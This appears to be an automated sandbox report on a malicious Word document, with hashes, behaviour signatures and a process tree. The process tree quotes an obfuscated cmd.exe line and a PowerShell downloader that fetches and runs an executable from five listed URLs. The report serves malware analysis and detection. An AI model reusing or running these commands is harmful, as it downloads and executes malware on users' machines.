Analysis

  • max time kernel
    139s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220718-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-07-2022 09:13

General

  • Target

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc

  • Size

    112KB

  • MD5

    bb7ac1a1873e29db1f7ad69aaf4a8127

  • SHA1

    e7a082ff41d8cc4a09d3f852c46cfb808659b476

  • SHA256

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • SHA512

    9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

Score
10/10

Malware Config

  • Extracted
    Language: ps1
    Deobfuscated
    URLs (exe.dropper):
      http://solvolab.com/sdB
      http://kenstones.com/pR
      http://benvisuals.com/S2hMkKS
      http://www.clinicacirurgiaplasticasp.com.br/Jmz
      http://pride.ge/0e40iT

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1944
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^$(^hc^a^er^o^f^;'^e^x^e^.^'+^p^JH^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$=^E^z^l^$^;^'^2^3^4^'^ ^=^ ^p^J^H^$^;)^'^@^'(^t^i^l^p^S^.'^T^i0^4^e^0/e^g^.^e^d^irp//^:^p^t^t^h^@^z^m^J/r^b^.^m^oc^.^p^s^ac^i^t^s^a^l^p^a^i^gr^ur^ic^acin^i^lc^.^w^w^w//^:^p^t^t^h^@^S^Kk^M^h2^S/^m^oc^.^s^l^a^us^ivn^e^b//^:^p^t^t^h^@R^p/^moc.^s^en^o^t^sn^e^k//^:^p^t^t^h^@^B^d^s/^moc^.^b^a^l^ov^lo^s//^:p^t^t^h^'=Cr^b^$;^tn^e^i^lC^b^e^W^.^t^eN^ ^tce^j^b^o^-^w^en^=^pr^Y^$^ ^l^l^e^h^sr^ewo^p&&^f^or /^L %^P ^in (^3^5^8^,^-^1,^0)^d^o ^s^e^t sX=!sX!!^x^i^U^5:~%^P,1!&&^i^f %^P=^=^0 c^a^l^l %sX:^~^4%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $Yrp=new-object Net.WebClient;$brC='http://solvolab.com/sdB@http://kenstones.com/pR@http://benvisuals.com/S2hMkKS@http://www.clinicacirurgiaplasticasp.com.br/Jmz@http://pride.ge/0e40iT'.Split('@');$HJp = '432';$lzE=$env:public+'\'+$HJp+'.exe';foreach($LQA in $brC){try{$Yrp.DownloadFile($LQA, $lzE);Invoke-Item $lzE;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1356

    Downloads

    • memory/560-62-0x00000000007A3000-0x00000000007A7000-memory.dmp (16KB)
    • memory/560-58-0x0000000076681000-0x0000000076683000-memory.dmp (8KB)
    • memory/560-54-0x0000000072AD1000-0x0000000072AD4000-memory.dmp (12KB)
    • memory/560-57-0x000000007153D000-0x0000000071548000-memory.dmp (44KB)
    • memory/560-63-0x00000000007A3000-0x00000000007A7000-memory.dmp (16KB)
    • memory/560-59-0x000000007153D000-0x0000000071548000-memory.dmp (44KB)
    • memory/560-92-0x000000007153D000-0x0000000071548000-memory.dmp (44KB)
    • memory/560-55-0x0000000070551000-0x0000000070553000-memory.dmp (8KB)
    • memory/560-56-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
    • memory/1356-89-0x000000006B090000-0x000000006B63B000-memory.dmp (5.7MB)
    • memory/1356-90-0x0000000004B80000-0x00000000051D1000-memory.dmp (6.3MB)
    • memory/1356-91-0x000000006B090000-0x000000006B63B000-memory.dmp (5.7MB)
    • memory/1356-93-0x000000006B090000-0x000000006B63B000-memory.dmp (5.7MB)
    • memory/1944-61-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp (8KB)